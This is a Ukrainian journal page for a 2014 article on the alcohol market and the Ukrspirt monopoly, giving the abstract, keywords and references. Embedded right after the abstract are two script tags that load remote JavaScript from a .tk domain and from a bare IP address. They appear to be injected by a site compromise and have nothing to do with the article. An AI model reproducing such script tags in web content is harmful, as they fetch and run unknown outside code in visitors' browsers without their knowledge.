ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.3:664.6
Аграрний ринок

Розвиток ринку спирту в Україні під впливом внутрішніх і зовнішніх факторів / Коткова Н. С. // Економіка АПК. - 2014. - № 1 - С. 33

Розглянуто проблеми розвитку ринку спирту в Україні під впливом внутрішніх та зовнішніх факторів. Регулювання ринку спирту здійснює Міністерство аграрної політики та продовольства України через Державне підприємство спирту та лікеро-горілчаної промисловості «Укрспирт» (ДП «Укр-спирт»). Нині спостерігається невідповідність потужностей спиртової промисловості України й ринку збуту. Основним виходом із такого становища є перепрофілювання підприємств спиртової промисловості з урахуванням проблем, що примушують до зазначених дій. ДП «Укрспирт» є монополістом на ринку спирту, тому державне регулювання є невід’ємною частиною цих процесів, що стримує розвиток ринку спирту та спиртопродуктів. Табл.: 3. Рис.: 5. Бібліогр.: 16.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: спиртова промисловість, державне регулювання, демонополізація спиртової галузі, експорт спирту етилового, внутрішнє споживання, ціна етанолу, паливний етанол

Список використаних джерел

 1. Акцизний податок на спирт та алкоголь знову зросте [Електронний ресурс]. – Режим доступу: http://tvoemisto.tv/news/58550.html.
 2. Бутнік-Сіверський О. Інноваційний шлях розвитку промисловості та проблеми становлення ринку спирту і лікеро-горілчаної продукції в Україні / О. Бутнік-Сіверський, Г. Шматкова, Л. Маринченко // Харчова і переробна промисловість. – 2003. – № 12. – С. 4–6.
 3. Державна програма активізації розвитку економіки на 2013-2014 роки / Затверджено постановою Кабінету Міністрів України від 27 лют. 2013 р. № 187 [Електронний ресурс]. – Режим доступу: http://www.kmu.gov.ua/control/publish/article?art_id=246247059.
 4. Державна служба статистики України. Статистична інформація [Електронний ресурс]. – Режим доступу: http://www.ukrstat.gov.ua.
 5. Маринченко В.О. Технологія спирту: [підруч.] / В. О. Маринченко, В. А. Домарецький, П. Л. Шиян, В. М. Швець. – К., Вінниця : НУХТ ; Поділля. – 2000, 2003. – 496 с.
 6. Мельничук О.І. Державне регулювання спиртової галузі України / О.І. Мельничук // Економіка харчової промисловості. – 2012. – №2(14). – С.46–49.
 7. Міністерство економічного розвитку і торгівлі України. Економічна ситуація та прогнози [Електронний ресурс]. – Режим доступу: // http://www.me.gov.ua.
 8. Потрібний спирт і непотрібні спиртозаводи [Електронний ресурс]. – Режим доступу: http://uaevents.com.ua/potribnyj-spyrt-i-nepotribni-spirtzavody.php.
 9. Спиртовий ринок: демонополізація [Електронний ресурс]. – Режим доступу: http://www.day.kiev.ua/uk/article/ekonomika/spirtoviy-rinok-demonopolizaciya.
 10. Українець А. Інноваційні енергозберігаючі технології. Їх впровадження – пріоритетний напрямок подальшого розвитку спиртової галузі / А. Українець, П. Шиян // Харчова і переробна промисловість. – 2010. – № 4. – С. 5–6.
 11. "Укрспирт" вважає, що штрафні санкції АМК загрожують алкогольному ринку України [Електронний ресурс]. – Режим доступу: // http://www.newsru.ua/finance/05jun2012/ukrspirt.html.
 12. Шматкова Г. Інноваційний шлях розвитку / Г. Шматкова, О. Маховка // Харчова і переробна промисловість. – 2005. – № 11. – С. 8–11.
 13. Шиян П.Л. Інноваційні технології спиртової промисловості. Теорія і практика: [моногр.] / П. Л. Шиян, В. В. Сосницький, С. Т. Олійнічук. – К.: ВД «Асканія», 2009. – 424 с.
 14. Licht, F.O. «World Ethanol and Biofuels Report», vol. 10, no. 16 (24 April 2012), p. 323 [Електронний ресурс]. – Режим доступу: http://www.earth-policy.org/datacenter/pdf/book_fpep_ch4_all.pdf.
 15. Renewable Fuels Association, F.O. Lichts. «Industry Statistics: 2012 World Fuel Ethanol Production» [Електронний ресурс]. – Режим доступу: http://ethanolrfa.org/pages/World-Fuel-Ethanol-Production.
 16. USDA Livestock, Poultry & Grain Market News «National Weekly Ethanol Summary» Fri, Sep 13 [Електронний ресурс]. – Режим доступу: http://www.ams.usda.gov/mnreports/lswethanol.pdf.
Читати статтю: 14_01_33-39.pdf
Читати переклад статті: 1401kotkova.pdf